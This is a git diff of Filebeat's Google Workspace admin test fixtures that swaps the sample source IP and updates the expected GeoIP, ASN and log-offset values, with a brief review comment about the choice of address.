-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_NAME","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_SETTING","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"WHITELISTED_GROUPS_UPDATED","parameters":[{"name":"WHITELISTED_GROUPS","value":"a,b,c"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CREATE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"DELETE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_DESCRIPTION","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_LIST_DOWNLOAD"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"ADD_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"REMOVE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBER_BULK_UPLOAD","parameters":[{"name":"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER","value":"0"},{"name":"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER","value":"10"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBERS_DOWNLOAD"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_NAME","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_SETTING","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"WHITELISTED_GROUPS_UPDATED","parameters":[{"name":"WHITELISTED_GROUPS","value":"a,b,c"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json
index 52257df41d75..0e6c2c2229ea 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json
@@ -8,7 +8,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CREATE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CREATE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "creation",
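Review bot: The replacement address 67.43.156.13 used on every line of this fixture (and in the expected.json sections that follow) is still a publicly routable address rather than one from the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), and nothing in the change records why. The expected output's `"source.as.number": 35908` / Bhutan entries suggest it was chosen because the test GeoIP database resolves it, so a later cleanup that "fixes" the fixture to a documentation address would silently drop the geo enrichment assertions. Since a JSON log cannot carry comments, a line in the module test README or the commit message would do, e.g. `Sample IPs use 67.43.156.13 because the test GeoIP database resolves it; do not replace it with an RFC 5737 address.`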
@@ -26,23 +26,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -63,7 +59,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"DELETE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"DELETE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "creation",
@@ -78,26 +74,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 379,
+ "log.offset": 378,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -118,7 +110,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_DESCRIPTION\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_DESCRIPTION\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change",
@@ -133,26 +125,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 758,
+ "log.offset": 756,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -173,7 +161,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_LIST_DOWNLOAD\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_LIST_DOWNLOAD\"}}",
 "event.provider": "admin",
 "event.type": [
 "group",
@@ -185,26 +173,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1149,
+ "log.offset": 1146,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -225,7 +209,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"ADD_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"ADD_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -241,27 +225,23 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 1469, + "log.offset": 1465, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -287,7 +267,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"REMOVE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"REMOVE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -303,27 +283,23 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 1901, + "log.offset": 1896, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -349,7 +325,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -367,27 +343,23 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 2336, + "log.offset": 2330, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -413,7 +385,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -431,27 +403,23 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 2841, + "log.offset": 2834, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -477,7 +445,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
